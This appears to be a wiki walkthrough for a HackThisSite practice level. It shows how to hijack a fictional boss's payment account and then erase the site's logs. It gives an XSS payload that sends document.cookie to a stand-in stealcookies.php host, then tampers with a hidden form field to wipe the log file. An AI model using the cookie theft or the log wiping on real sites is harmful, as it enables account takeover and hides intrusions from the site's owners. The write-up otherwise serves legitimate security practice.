Hackthissite/Realistic/Level9

From aldeid
Jump to navigation Jump to search

The boss over at CrappySoft has stopped paying his employees, and your friend is in need of money, fast. Help them get their salary paid. Message: Hey man, I've heard you're good at hacking, and on the right side of things. So I came looking for you. I really need help, you see, my boss has stopped paying our salaries and I'm going to miss my rent! Please help me get my money, you can reach the site at Crappy Soft. They have an online payment system, but only he can use it. Maybe you can get into his account somehow, but for now you can use mine:

Thanks man, good luck.

  • Solution:

Connect as administrator

Click on "Private Message" from the menu and fill the form as follows, using following XSS:

javascript:void(window.location='http://domain.tld/stealcookies.php?'+document.cookie);

Hackthissite-realistic-9-10.png

To simplify the attack, the site is directly providing us with the stollen information:

Use Firecookie in Firefox to change the values as follows:

Hackthissite-realistic-9-20.png

When you paste the content of the username, take care to transform "%40" in "@".

Click on Pay salaries and then on the Pay button. You're done with this stage

Cover your tracks

Click on "Mailing list" link and edit source code. Notice that there is a hidden field named strFilename with value ./files/mailinglist/addresses.txt. If you look at this file, you will get the list of email addresses:

Hackthissite-realistic-9-30.png

Hackthissite-realistic-9-40.png

In addition, the mailing list form says that it deletes all references that do not contain "@", perfect to clear the log file. Also notice that directory listening is activated on files/ directory. We can find our log file:

Hackthissite-realistic-9-50.png

Just replace the value in the hidden field with this:

./files/logs/logs.txt

Submit the form and you're done!

Comments

Talk:Hackthissite/Realistic/Level9